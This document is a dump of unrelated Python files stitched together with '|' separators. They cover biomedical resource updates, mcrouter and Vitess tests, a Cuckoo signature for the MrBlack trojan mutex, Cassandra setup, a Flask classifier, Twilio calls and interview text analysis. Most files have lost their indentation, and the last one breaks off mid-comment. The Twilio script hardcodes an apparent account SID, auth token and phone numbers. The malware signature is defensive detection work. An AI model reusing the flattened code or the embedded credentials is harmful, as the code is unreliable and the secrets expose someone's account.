name_lines = []
url = 'https://raw.githubusercontent.com/OpenBEL/' + \
'openbel-framework-resources/latest/equivalence/'
url1 = url + 'chebi-ids.beleq'
url2 = url + 'chebi.beleq'
res1 = load_from_http(url1).decode('utf-8')
res2 = load_from_http(url2).decode('utf-8')
id_lines1 = [lin.strip() for lin in res1.split('\n') if lin]
start = id_lines1.index('[Values]')
id_lines1 = id_lines1[start+1:]
id_lines += id_lines1
name_lines1 = [lin.strip() for lin in res2.split('\n') if lin]
start = name_lines1.index('[Values]')
name_lines1 = name_lines1[start + 1:]
name_lines += name_lines1
# Here we need to get the ChEBI to primary map to make sure we map
# to primary IDs
with open(os.path.join(path, 'chebi_to_primary.tsv'), 'r') as fh:
chebi_to_primary = {k: v for k, v in
[l.strip().split('\t') for
l in fh.readlines()][1:]}
id_map = {}
for id_line in id_lines:
if id_line:
# Instead of splitting on |, split using UUID fixed length
chebi_id = id_line[:-37]
uuid = id_line[-36:]
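            # Illustrative line shape (hypothetical id/uuid):
            #   '15377|123e4567-e89b-12d3-a456-426614174000'
            # -> chebi_id is everything before the '|', uuid the final 36 chars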
# Map secondary IDs to primary IDs before adding to the map
if chebi_id in chebi_to_primary:
chebi_id = chebi_to_primary[chebi_id]
id_map[uuid] = chebi_id
name_map = {}
for name_line in name_lines:
if name_line:
# Instead of splitting on |, split using UUID fixed length
chebi_name = name_line[:-37]
uuid = name_line[-36:]
name_map[uuid] = chebi_name
name_to_id = {}
for uuid, chebi_name in name_map.items():
chebi_id = id_map.get(uuid)
if chebi_id is not None:
if chebi_name in name_to_id:
old_id = int(name_to_id[chebi_name])
new_id = int(chebi_id)
if new_id <= old_id:
continue
name_to_id[chebi_name] = chebi_id
fname = os.path.join(path, 'bel_chebi_map.tsv')
logger.info('Saving into %s' % fname)
with open(fname, 'wb') as fh:
for chebi_name, chebi_id in sorted(name_to_id.items(),
key=lambda x: x[0]):
fh.write(('%s\tCHEBI:%s\n' % (chebi_name, chebi_id)).encode('utf-8'))
def update_entity_hierarchy():
logger.info('--Updating entity hierarchy----')
fname = os.path.join(path, 'famplex/relations.csv')
make_ent_hierarchy(fname)
def update_modification_hierarchy():
logger.info('--Updating modification hierarchy----')
make_mod_hierarchy()
def update_activity_hierarchy():
logger.info('--Updating activity hierarchy----')
make_act_hierarchy()
def update_cellular_component_hierarchy():
logger.info('--Updating cellular component hierarchy----')
make_ccomp_hierarchy()
def update_famplex_map():
logger.info('--Updating FamPlex map----')
# Currently this is a trivial "copy" of the FamPlex equivalences.csv
# file. Later, name spaces may need to be adapted and other format changes
# may be needed.
fname_in = os.path.join(path, 'famplex/equivalences.csv')
fname_out = os.path.join(path, 'famplex_map.tsv')
rows = read_unicode_csv(fname_in)
write_unicode_csv(fname_out, rows, delimiter='\t')
def update_ncit_map():
logger.info('--Updating NCIT map----')
url_hgnc = 'https://ncit.nci.nih.gov/ncitbrowser/ajax?action=' + \
'export_mapping&dictionary=NCIt_to_HGNC_Mapping&version=1.0'
url_go = 'https://ncit.nci.nih.gov/ncitbrowser/ajax?action=' + \
'export_mapping&dictionary=GO_to_NCIt_Mapping&version=1.1'
url_chebi = 'https://ncit.nci.nih.gov/ncitbrowser/ajax?action=' + \
'export_mapping&dictionary=NCIt_to_ChEBI_Mapping&version=1.0'
def get_ncit_df(url):
df = pandas.read_csv(url)
df = df[df['Association Name'] == 'mapsTo']
df.sort_values(['Source Code', 'Target Code'], ascending=True,
inplace=True)
df = df[['Source Code', 'Target Code', 'Source Coding Scheme',
'Target Coding Scheme']]
return df
df_hgnc = get_ncit_df(url_hgnc)
    df_hgnc.replace(r'HGNC:(\d*)\s*', r'\1', inplace=True, regex=True)
df_go = get_ncit_df(url_go)
df_go.rename(columns={'Source Code': 'Target Code',
'Target Code': 'Source Code',
'Source Coding Scheme': 'Target Coding Scheme',
'Target Coding Scheme': 'Source Coding Scheme'},
inplace=True)
df_chebi = get_ncit_df(url_chebi)
df_chebi.replace('ChEBI', 'CHEBI', inplace=True)
# Add the old HGNC mappings
    df_hgnc_old = pandas.read_csv(os.path.join(path, 'ncit_hgnc_map_old.tsv'),
                                  sep='\t', index_col=None, dtype=str)
    df_hgnc = pandas.concat([df_hgnc, df_hgnc_old])
df_hgnc.sort_values(['Source Code', 'Target Code'], ascending=True,
inplace=True)
# Add UniProt mappings
    df_uniprot = pandas.read_csv(os.path.join(path, 'Feb2017NCIt-SwissProt.txt'),
                                 sep='\t', index_col=None)
up_entries = {'Source Code': [], 'Target Coding Scheme': [],
'Target Code': []}
for entry in df_uniprot.iterrows():
up_entries['Source Code'].append(entry[1]['code'].strip())
up_entries['Target Coding Scheme'].append('UP')
up_entries['Target Code'].append(entry[1]['Swiss_Prot'].strip())
df_uniprot = pandas.DataFrame.from_dict(up_entries)
df_uniprot.sort_values(['Source Code', 'Target Code'], ascending=True,
inplace=True)
df_all = pandas.concat([df_chebi, df_go, df_hgnc, df_uniprot])
fname = os.path.join(path, 'ncit_map.tsv')
df_all.to_csv(fname, sep='\t', columns=['Source Code',
'Target Coding Scheme',
'Target Code'],
header=['NCIT ID', 'Target NS', 'Target ID'], index=False)
def update_chebi_names():
logger.info('--Updating ChEBI names----')
url = 'ftp://ftp.ebi.ac.uk/pub/databases/chebi/' + \
'Flat_file_tab_delimited/names_3star.tsv.gz'
fname = os.path.join(path, 'names_3star.tsv.gz')
urlretrieve(url, fname)
with gzip.open(fname, 'rb') as fh:
logger.info('Loading %s' % fname)
        df = pandas.read_csv(fh, sep='\t', index_col=None)
fname = os.path.join(path, 'chebi_names.tsv')
df = df[df['TYPE'] == 'NAME']
df.sort_values(by='COMPOUND_ID', inplace=True)
logger.info('Saving into %s' % fname)
df.to_csv(fname, sep='\t', header=True, index=False,
columns=['COMPOUND_ID', 'NAME'])
def update_famplex():
"""Update all the CSV files that form the FamPlex resource."""
famplex_url_pattern = \
'https://raw.githubusercontent.com/sorgerlab/famplex/master/%s.csv'
csv_names = ['entities', 'equivalences', 'gene_prefixes',
'grounding_map', 'relations']
for csv_name in csv_names:
url = famplex_url_pattern % csv_name
save_from_http(url, os.path.join(path,'famplex/%s.csv' % csv_name))
if __name__ == '__main__':
update_famplex()
update_famplex_map()
update_hgnc_entries()
update_kinases()
update_uniprot_entries()
update_uniprot_sec_ac()
update_uniprot_subcell_loc()
update_chebi_entries()
update_chebi_names()
update_chebi_primary_map()
update_cas_to_chebi()
update_cellular_components()
update_bel_chebi_map()
update_entity_hierarchy()
update_modification_hierarchy()
update_activity_hierarchy()
update_cellular_component_hierarchy()
update_ncit_map()
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the LICENSE
# file in the root directory of this source tree.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import time
from mcrouter.test.MCProcess import Mcrouter, Memcached, MockMemcached
class McrouterTestCase(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(McrouterTestCase, self).__init__(*args, **kwargs)
self.use_mock_mc = False
def ensureClassVariables(self):
if 'open_servers' not in self.__dict__:
self.open_servers = []
if 'open_ports' not in self.__dict__:
self.open_ports = []
def add_server(self, server, logical_port=None):
self.ensureClassVariables()
server.ensure_connected()
self.open_servers.append(server)
self.open_ports.append(server.getport())
if logical_port:
if 'port_map' not in self.__dict__:
self.port_map = {}
if logical_port in self.port_map:
raise Exception("logical_port %d was already used"
% logical_port)
self.port_map[logical_port] = server.getport()
return server
def add_mcrouter(self, config, route=None, extra_args=None,
replace_map=None, bg_mcrouter=False):
self.ensureClassVariables()
substitute_ports = (self.open_ports
if 'port_map' not in self.__dict__
else self.port_map)
mcrouter = Mcrouter(config,
substitute_config_ports=substitute_ports,
default_route=route,
extra_args=extra_args,
replace_map=replace_map)
mcrouter.ensure_connected()
if bg_mcrouter:
self.open_ports.append(mcrouter.getport())
if 'open_mcrouters' not in self.__dict__:
self.open_mcrouters = []
self.open_mcrouters.append(mcrouter)
return mcrouter
def make_memcached(self):
return MockMemcached() if self.use_mock_mc else Memcached()
def get_open_ports(self):
self.ensureClassVariables()
return self.open_ports
def tearDown(self):
# Stop mcrouters first to close connections to servers
        # (some mock servers might be blocked on recv() calls)
if 'open_mcrouters' in self.__dict__:
for mcr in self.open_mcrouters:
mcr.terminate()
if 'open_servers' in self.__dict__:
for server in self.open_servers:
server.terminate()
def eventually_get(self, key, expVal, timeout=5):
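        # Note: assumes the concrete test case assigned a client to self.mc
        # before calling this helper; this base class does not set it.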
start_time = time.time()
interval = 0.5
        while True:
            if self.mc.get(key) == expVal:
                return True
            time.sleep(interval)
            if time.time() - start_time > timeout:
                return False
|
# Copyright (C) 2010-2015 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# This signature was contributed by RedSocks - http://redsocks.nl
# See the file 'docs/LICENSE' for copying permission.
from lib.cuckoo.common.abstracts import Signature
class trojanmrblack(Signature):
name = "trojan_mrblack"
description = "Creates known MrBlack Trojan files, registry keys and/or mutexes"
severity = 3
categories = ["trojan"]
families = ["mrblack"]
authors = ["RedSocks"]
minimum = "2.0"
mutexes_re = [
".*MrBLaCK",
]
def on_complete(self):
for indicator in self.mutexes_re:
mutex = self.check_mutex(pattern=indicator, regex=True)
if mutex:
self.mark_ioc("mutex", mutex)
return self.has_marks()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''Script to setup GraphSense keyspaces.'''
from argparse import ArgumentParser
from cassandra.cluster import Cluster
DEFAULT_TIMEOUT = 60
KEYSPACE_PLACEHOLDER = 'btc_transformed'
class StorageError(Exception):
'''Class for Cassandra-related errors'''
def __init__(self, message, nested_exception=None):
super().__init__('Cassandra Error: ' + message)
self.nested_exception = nested_exception
def __str__(self):
msg = super(StorageError, self).__str__()
if self.nested_exception:
msg = msg + '\nError Details: ' + str(self.nested_exception)
return msg
class Cassandra:
'''Cassandra connector'''
def __init__(self, db_nodes):
self.db_nodes = db_nodes
self.cluster = None
self.session = None
def connect(self):
'''Connect to given Cassandra cluster nodes.'''
self.cluster = Cluster(self.db_nodes)
try:
self.session = self.cluster.connect()
self.session.default_timeout = DEFAULT_TIMEOUT
except Exception as e:
raise StorageError(f'Cannot connect to {self.db_nodes}', e)
def has_keyspace(self, keyspace):
'''Check whether a given keyspace is present in the cluster.'''
if not self.session:
raise StorageError('Session not available. Call connect() first')
try:
query = 'SELECT keyspace_name FROM system_schema.keyspaces'
result = self.session.execute(query)
keyspaces = [row.keyspace_name for row in result]
return keyspace in keyspaces
except Exception as e:
raise StorageError(f'Error when executing query:\n{query}', e)
def setup_keyspace(self, keyspace, schema_file):
'''Setup keyspace and tables.'''
if not self.session:
raise StorageError('Session not available, call connect() first')
with open(schema_file, 'r') as fh:
schema = fh.read()
# replace keyspace name placeholder in CQL schema script
schema = schema.replace(KEYSPACE_PLACEHOLDER, keyspace)
statements = schema.split(';')
for stmt in statements:
stmt = stmt.strip()
if len(stmt) > 0:
self.session.execute(stmt + ';')
def close(self):
'''Closes the cassandra cluster connection.'''
self.cluster.shutdown()
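# Example usage (hypothetical node list and schema file):
#   cassandra = Cassandra(['127.0.0.1'])
#   cassandra.connect()
#   if not cassandra.has_keyspace('btc_transformed_test'):
#       cassandra.setup_keyspace('btc_transformed_test', 'schema.cql')
#   cassandra.close()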
def main():
'''Main function.'''
parser = ArgumentParser(description='Create keyspace in Cassandra',
epilog='GraphSense - http://graphsense.info')
parser.add_argument('-d', '--db_nodes', dest='db_nodes', nargs='+',
default='localhost', metavar='DB_NODE',
help='list of Cassandra nodes (default "localhost")')
parser.add_argument('-k', '--keyspace', dest='keyspace_name',
required=True, metavar='KEYSPACE',
help='name of GraphSense keyspace')
parser.add_argument('-s', '--schema', dest='schema_template',
required=True, metavar='CQL_SCHEMA',
help='Cassandra schema for GraphSense keyspace')
args = parser.parse_args()
cassandra = Cassandra(args.db_nodes)
cassandra.connect()
if not cassandra.has_keyspace(args.keyspace_name):
cassandra.setup_keyspace(args.keyspace_name, args.schema_template)
print(f'Success: Keyspace "{args.keyspace_name}" created.')
else:
print(f'Error: Keyspace "{args.keyspace_name}" already exists.')
cassandra.close()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
import json
import logging
import re
import time
import unittest
import urllib2
from vtproto import topodata_pb2
import environment
import tablet
import utils
# range '' - 80
shard_0_master = tablet.Tablet(use_mysqlctld=True)
shard_0_replica = tablet.Tablet(use_mysqlctld=True)
shard_0_rdonly = tablet.Tablet(use_mysqlctld=True)
all_shard_0_tablets = [shard_0_master, shard_0_replica, shard_0_rdonly]
# range 80 - ''
shard_1_master = tablet.Tablet(use_mysqlctld=True)
shard_1_replica = tablet.Tablet(use_mysqlctld=True)
shard_1_rdonly = tablet.Tablet(use_mysqlctld=True)
all_shard_1_tablets = [shard_1_master, shard_1_replica, shard_1_rdonly]
# all tablets
all_tablets = all_shard_0_tablets + all_shard_1_tablets
def setUpModule():
try:
environment.topo_server().setup()
for t in all_tablets:
t.init_mysql()
utils.Vtctld().start()
for t in all_tablets:
t.wait_for_mysqlctl_socket()
except:
tearDownModule()
raise
def tearDownModule():
utils.required_teardown()
if utils.options.skip_teardown:
return
teardown_procs = [t.teardown_mysql() for t in all_tablets]
utils.wait_procs(teardown_procs, raise_on_error=False)
environment.topo_server().teardown()
utils.kill_sub_processes()
utils.remove_tmp_files()
for t in all_tablets:
t.remove_tree()
class TestSchemaSwap(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._start_tablets('-80',
[shard_0_master, shard_0_replica],
[shard_0_rdonly])
cls._start_tablets('80-',
[shard_1_master, shard_1_replica],
[shard_1_rdonly])
for t in all_tablets:
t.wait_for_vttablet_state('NOT_SERVING')
utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/-80',
shard_0_master.tablet_alias], auto_log=True)
utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/80-',
shard_1_master.tablet_alias], auto_log=True)
utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True)
for t in all_tablets:
t.wait_for_vttablet_state('SERVING')
@classmethod
def _start_tablets(cls, shard_name, replica_tablets, rdonly_tablets):
"""Start all tablets on a shard.
Args:
shard_name: string, name of the shard passed to the tablet.
replica_tablets: list of tablet.Tablet, list of tablets that should be
started as replica.
rdonly_tablets: list of tablet.Tablet, list of tablets that should be
started as rdonly.
"""
for t in replica_tablets:
t.start_vttablet(wait_for_state=None,
init_tablet_type='replica',
init_keyspace='test_keyspace',
init_shard=shard_name,
extra_args=utils.vtctld.process_args())
for t in rdonly_tablets:
t.start_vttablet(wait_for_state=None,
init_tablet_type='rdonly',
init_keyspace='test_keyspace',
init_shard=shard_name,
extra_args=utils.vtctld.process_args())
create_table_sql = ('DROP TABLE IF EXISTS test; '
'CREATE TABLE test (id int, PRIMARY KEY(id)) '
'Engine=InnoDB')
schema_swap_sql = 'ALTER TABLE test ADD COLUMN (t TEXT)'
show_schema_sql = 'SHOW CREATE TABLE test'
schema_check_string = '`t` text,'
def _check_final_schema(self):
"""Check that schema of test table is correct after a successful swap."""
schema_0 = shard_0_master.mquery('vt_test_keyspace',
self.show_schema_sql)[0][1]
schema_1 = shard_1_master.mquery('vt_test_keyspace',
self.show_schema_sql)[0][1]
self.assertEqual(schema_0, schema_1)
self.assertIn(self.schema_check_string, schema_0)
def setUp(self):
utils.run_vtctl(['ApplySchema',
'-sql=%s' % self.create_table_sql,
'test_keyspace'],
auto_log=True)
for t in [shard_0_master, shard_1_master]:
tablet_info = utils.run_vtctl_json(['GetTablet', t.tablet_alias])
if tablet_info['type'] != topodata_pb2.MASTER:
utils.run_vtctl(['InitShardMaster', '-force',
'test_keyspace/' + t.shard, t.tablet_alias],
auto_log=True)
tablet_info = utils.run_vtctl_json(['GetTablet', t.tablet_alias])
self.assertEqual(tablet_info['type'], topodata_pb2.MASTER)
t.mquery('_vt', "DELETE FROM shard_metadata where name in ("
"'LastStartedSchemaSwap','LastFinishedSchemaSwap',"
"'CurrentSchemaSwapSQL');"
"DELETE FROM local_metadata "
"where name = 'LastAppliedSchemaSwap';")
self._vtctld_url = 'http://localhost:%d' % utils.vtctld.port
self._wait_for_functional_vtctld()
self._start_vtctld_long_poll()
def _start_swap(self, sql):
"""Start a new schema swap with the given SQL statement."""
self._swap_error = None
vtctl_res = utils.run_vtctl(['WorkflowCreate',
'schema_swap',
'-keyspace=test_keyspace',
'-sql=%s' % sql],
auto_log=True)
m = re.match(r'^uuid: (.*)$', vtctl_res[0])
return m.group(1)
def _stop_swap(self, swap_uuid):
"""Stop the running schema swap with the given uuid."""
utils.run_vtctl(['WorkflowStop', swap_uuid], auto_log=True)
def _delete_swap(self, swap_uuid):
"""Delete the schema swap with the given uuid."""
utils.run_vtctl(['WorkflowDelete', swap_uuid], auto_log=True)
def _fetch_json_from_vtctld(self, url_path):
"""Fetch and deserialize a json object from vtctld.
Args:
url_path: string, a path appended to vtctld address to create a URL that
is used to fetch json object from.
Returns:
deserialized json object returned from vtctld.
"""
full_url = '%s/%s' % (self._vtctld_url, url_path)
f = urllib2.urlopen(full_url)
res_json = f.read()
f.close()
return json.loads(res_json)
def _start_vtctld_long_poll(self):
"""Start long polling of workflow updates from vtctld."""
poll_update = self._fetch_json_from_vtctld('api/workflow/create')
self._poll_id = poll_update['index']
return poll_update
def _wait_for_functional_vtctld(self):
"""Wait until vtctld is fully up and is able to respond to polls."""
while True:
try:
poll_update = self._fetch_json_from_vtctld('api/workflow/create')
if poll_update.get('index') is None:
time.sleep(0.1)
continue
break
except urllib2.HTTPError:
pass
def _send_retry_vtctld_action(self, swap_uuid):
"""Emulate click of the Retry button on the schema swap."""
req = urllib2.Request('%s/api/workflow/action/%s' %
(self._vtctld_url, self._poll_id))
req.add_header('Content-Type', 'application/json; charset=utf-8')
resp = urllib2.urlopen(req, '{"path":"/%s","name":"Retry"}' % swap_uuid)
logging.info('Retry response code: %r', resp.getcode())
def _strip_logs_from_nodes(self, nodes):
"""Strip all the logs from the node hierarchy."""
for node in nodes:
if node.get('log'):
del node['log']
if node.get('children'):
self._strip_logs_from_nodes(node['children'])
def _poll_vtctld(self):
"""Do one poll of vtctld for updates to workflow UI.
If for any reason the poll breaks the method tries to restart the long
polling.
Returns:
deserialized json object that came from vtctld as the result of poll. Can
be an incremental or a full update.
"""
try:
poll_update = self._fetch_json_from_vtctld('api/workflow/poll/%s' %
self._poll_id)
except urllib2.HTTPError as e:
logging.info('Error polling vtctld, will try to re-create the long poll: '
'%s', e)
poll_update = self._start_vtctld_long_poll()
if poll_update.get('nodes'):
# Log contents in the nodes is very big and makes our test logs very hard
# to read without bringing any new information (the history of actions is
# already present in test logs through the logging of incremental polls
# that is done here). Because of that we are stripping all the log
# contents from the nodes hierarchy.
self._strip_logs_from_nodes(poll_update['nodes'])
logging.info('Workflow polling update: %r', poll_update)
return poll_update
def _has_swap_done_or_error(self, nodes, swap_uuid):
"""Check if the node list has root node of the swap that is finished.
Args:
nodes: list, list of nodes that came in an update from vtctld.
swap_uuid: string, uuid of the swap to look for.
Returns:
bool, whether the list of nodes had the root node for the swap and the
swap was finished. When True is returned self._swap_error will contain
the error or success message displayed in the swap root node.
"""
for node in nodes:
if node['pathName'] == swap_uuid:
if node['actions'] or node['state'] == 2:
# Button Retry appeared or state is 'Done'. Then the 'message' will
# have the error.
self._swap_error = node['message']
return True
# Other nodes are not interesting.
break
return False
def _wait_for_success_or_error(self, swap_uuid, reset_error=False):
"""Wait until schema swap finishes successfully or with error.
Args:
swap_uuid: string, uuid of the schema swap to wait for.
reset_error: bool, should be set to True when the swap already had an
error and we need to wait for the next one.
Returns:
string, error or success message displayed on the schema swap.
"""
if reset_error:
self._swap_error = None
# Error can have been seen already during execution of
# _wait_for_progress_message().
if self._swap_error is not None:
return self._swap_error
while True:
poll_update = self._poll_vtctld()
if not poll_update.get('nodes'):
continue
if self._has_swap_done_or_error(poll_update['nodes'], swap_uuid):
return self._swap_error
def _has_progress_message(self, nodes, message):
"""Check if any node in the hierarchy has the given progress message."""
for node in nodes:
if node.get('progressMsg') == message:
return True
children = node.get('children')
if children and self._has_progress_message(children, message):
return True
return False
def _wait_for_progress_message(self, swap_uuid, message):
"""Wait until at least one node has the given progress message.
The method returns when some node has the given progress message or when
the given swap has finished successfully or with an error. The latter is
necessary to not wait forever if the swap finishes without ever having the
given progress message.
Args:
swap_uuid: string, uuid of the swap being waited for.
message: string, progress message to wait for.
"""
while True:
poll_update = self._poll_vtctld()
if not poll_update.get('nodes'):
continue
if self._has_progress_message(poll_update['nodes'], message):
return
if self._has_swap_done_or_error(poll_update['nodes'], swap_uuid):
return
def test_successful_swap(self):
"""Normal swap running from start to finish, "happy path"."""
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
def test_restarted_swap(self):
"""Force a restart of schema swap in the middle."""
swap_uuid = self._start_swap(self.schema_swap_sql)
# Wait until at least one tablet has the new schema (the progress message is
# '1/3') and then forcefully stop the swap.
self._wait_for_progress_message(swap_uuid, '1/3')
self._stop_swap(swap_uuid)
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn('context canceled', err)
self._delete_swap(swap_uuid)
# While we are at it try to start new swap with a different SQL statement.
# The swap should fail.
swap_uuid = self._start_swap('ALTER TABLE test ADD COLUMN i int')
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn('different set of SQL statements', err)
self._stop_swap(swap_uuid)
self._delete_swap(swap_uuid)
# Now restart with the correct statement and should succeed.
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
def _retry_or_restart_swap(self, swap_uuid, use_retry):
"""Click Retry button on the swap or fully restart it.
Args:
swap_uuid: string, uuid of the schema swap to restart.
use_retry: bool, if True then Retry button is clicked, if False then the
swap is restarted completely as a new workflow.
Returns:
string, uuid of the new swap if it's restarted, or swap_uuid if the swap
was retried.
"""
if use_retry:
self._send_retry_vtctld_action(swap_uuid)
else:
self._stop_swap(swap_uuid)
self._delete_swap(swap_uuid)
swap_uuid = self._start_swap(self.schema_swap_sql)
return swap_uuid
def _test_init_error(self, use_retry):
"""Schema swap interrupted by an error during initialization."""
# By marking the master read-only we cause an error when schema swap tries
# to write shard metadata during initialization.
shard_1_master.mquery('', 'SET GLOBAL read_only = 1')
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn('running with the --read-only option', err)
shard_1_master.mquery('', 'SET GLOBAL read_only = 0')
swap_uuid = self._retry_or_restart_swap(swap_uuid, use_retry=use_retry)
err = self._wait_for_success_or_error(swap_uuid, reset_error=True)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
def test_init_error_with_retry(self):
self._test_init_error(use_retry=True)
def test_init_error_with_restart(self):
self._test_init_error(use_retry=False)
def _test_apply_error(self, use_retry):
"""Schema swap interrupted while applying seed schema change."""
# Renaming the test table to cause ALTER TABLE executed during schema swap
# to fail.
shard_1_master.mquery('vt_test_keyspace', 'RENAME TABLE test TO test2')
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn("Table 'vt_test_keyspace.test' doesn't exist", err)
shard_1_master.mquery('vt_test_keyspace', 'RENAME TABLE test2 TO test')
swap_uuid = self._retry_or_restart_swap(swap_uuid, use_retry=use_retry)
err = self._wait_for_success_or_error(swap_uuid, reset_error=True)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
def test_apply_error_with_retry(self):
self._test_apply_error(use_retry=True)
def test_apply_error_with_restart(self):
self._test_apply_error(use_retry=False)
def _restart_vtctld(self, extra_flags):
"""Restart vtctld possibly passing it some additional flags.
The method makes sure that restarted vtctld has the same listening port as
the one that was before.
Args:
extra_flags: list of strings, list of additional flags to pass to vtctld
"""
vtctld_port = utils.vtctld.port
utils.vtctld.proc.terminate()
utils.vtctld.proc.wait()
utils.vtctld = None
new_vtctld = utils.Vtctld()
new_vtctld.port = vtctld_port
new_vtctld.start(extra_flags=extra_flags)
self._wait_for_functional_vtctld()
def test_reparent_error(self):
"""Schema swap interrupted by an error during reparent."""
# With -disable_active_reparents and without 'reparent_away' hook on
# vttablet the attempt to reparent during schema swap will always fail.
self._restart_vtctld(extra_flags=['-disable_active_reparents'])
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn("Error executing 'reparent_away'", err)
self._restart_vtctld(extra_flags=[])
# We don't need to restart the swap here because it's automatically
# restarted by vtctld when it's started.
err = self._wait_for_success_or_error(swap_uuid, reset_error=True)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
if __name__ == '__main__':
utils.main()
|
"Iris Controller"
from flask import abort, jsonify, request, current_app
from flask_accepts import responds, accepts
from flask_praetorian import roles_required
from flask_restplus import Namespace, Resource
from app import api, guard
from app.models import User
from app.services.iris_service import IrisClf
iris_api = Namespace("Iris", description="Iris API")
# Preferably this would fetch an already-trained classifier with prediction
# capabilities from a data source, instead of training the model from scratch
# every time the app starts up
iris_clf = IrisClf()
@iris_api.route("/train")
@iris_api.doc(security="jwt")
class IrisTrainResource(Resource):
def get(self):
return iris_clf.train_iris_model()
@iris_api.route("/query")
@iris_api.doc(security="jwt")
class IrisQueryResource(Resource):
@accepts(
dict(name="sep_length", type=float, required=True),
dict(name="sep_width", type=float, required=True),
dict(name="pet_length", type=float, required=True),
dict(name="pet_width", type=float, required=True),
api=api,
)
def get(self):
X = [
[
request.parsed_args["sep_length"],
request.parsed_args["sep_width"],
request.parsed_args["pet_length"],
request.parsed_args["pet_width"],
]
]
return iris_clf.query_clf(X)[0]
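# Example query (hypothetical mount point for this namespace):
#   GET /iris/query?sep_length=5.1&sep_width=3.5&pet_length=1.4&pet_width=0.2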
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
from twilio.rest import TwilioRestClient
from lib.constants import BASE_URL
import requests
account_sid = "AC564a7022d50ef41d59bb316ec4f0aabd" # Your Account SID from www.twilio.com/console
auth_token = "ebecd1386153ef898ff84afeb8f7b1c4" # Your Auth Token from www.twilio.com/console
base_url = "https://api.twilio.com"
client = TwilioRestClient(account_sid, auth_token)
def send_url_sms(interview_id):
client.messages.create(
to="+16073388347",
from_="+13232714335",
body="Your interview analysis is available at " + BASE_URL + "/interviews/" + str(interview_id) + "/stats",
)
def init_call(url, to, interview_id):
call = client.calls.create(url=url, to=to, from_="+13232714335",
record=True, method="GET",
                              recording_status_callback=BASE_URL + "/interviews/" + str(interview_id) + "/actions/fetch_recordings",
recording_status_callback_method="POST",
recording_status_events=["completed"])
return call.sid
def fetch_recordings(call_sid):
recording_url = base_url + "/2010-04-01/Accounts/%s/Calls/%s/Recordings.json" % (account_sid, call_sid)
r = requests.get(recording_url, auth=(account_sid, auth_token))
recording_json = r.json()
recordings = []
for record in recording_json['recordings']:
if record['source'] != 'RecordVerb':
continue
recording = {}
recording['url'] = base_url + record['uri'][:-5]
rec = client.recordings.get(record['sid'])
for t in rec.transcriptions.list():
recording['text'] = t.transcription_text
recordings.append(recording)
return recordings
import json
import language_check
from os.path import join, dirname
from watson_developer_cloud import AlchemyLanguageV1
fillers = ['like', 'umm', 'ah', 'you know', 'ok so']
tool = language_check.LanguageTool('en-US')
def execute(raw):
num_filler_words = 0
num_grammatical_errors = 0
raw_sections = raw
sections = raw_sections['sections']
result = '''
{
"sections": [
'''
for i in range(0, len(sections)):
section = sections[i]
question = section['question']
response = section['response']
result += '''
{
"question":"'''+question+'''",
"response":"'''+response+'''",
'''
sentences = response.split('.')
new_response = ''
result += '''
"grammatical_errors": [
'''
for sentence in sentences:
sentence = sentence.strip()
# num_filler_words_in_response = 0
for filler_word in fillers:
if filler_word in sentence:
num_filler_words += 1
# num_filler_words_in_response += 1
                    sentence = sentence.replace(filler_word, '')
new_response += sentence + '. '
            grammar_matches = tool.check(sentence)
            if len(grammar_matches) > 0:
                result += '''
                {
                '''
                num_grammatical_errors += len(grammar_matches)
                result += '''
                "errors": [
                '''
                # Use a separate index so the outer section counter `i`
                # is not clobbered by this inner loop.
                for j in range(0, len(grammar_matches)):
                    result += '''
                    {
                        "suggestion":"'''+grammar_matches[j].msg+'''",
                        "replacements":"'''+''.join(grammar_matches[j].replacements)+'''"
                    }
                    '''
                    if j < len(grammar_matches) - 1:
                        result += ','
                result += '''
                ],
                "sentence":"'''+sentence+'''",
                "corrected":"'''+language_check.correct(sentence.strip(), grammar_matches)+'''"
            }
            '''
result += '''
],
'''
raw_text_analytics = getTextAnalytics(new_response)
score = '0'
try:
score = raw_text_analytics['docSentiment']['score']
except:
pass
result += '''
"response_sentiment": {
"score": "'''+score+'''",
"type": "'''+raw_text_analytics['docSentiment']['type']+'''"
},
"emotions": {
"anger": "'''+raw_text_analytics['docEmotions']['anger']+'''",
"joy": "'''+raw_text_analytics['docEmotions']['joy']+'''",
"fear": "'''+raw_text_analytics['docEmotions']['fear']+'''",
"sadness": "'''+raw_text_analytics['docEmotions']['sadness']+'''",
"disgust": "'''+raw_text_analytics['docEmotions']['disgust']+'''"
}
'''
result += '''
}
'''
if i < len(sections) - 1:
result += ','
result += '''
],
"stats": {
"num_filler_words": '''+str(num_filler_words)+''',
"num_grammatical_errors": '''+str(num_grammatical_errors)+'''
}
}
'''
return json.loads(result)
# return result.encode('ascii', 'ignore').decode('ascii')
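# Note: building JSON by string concatenation is fragile: quotes or newlines
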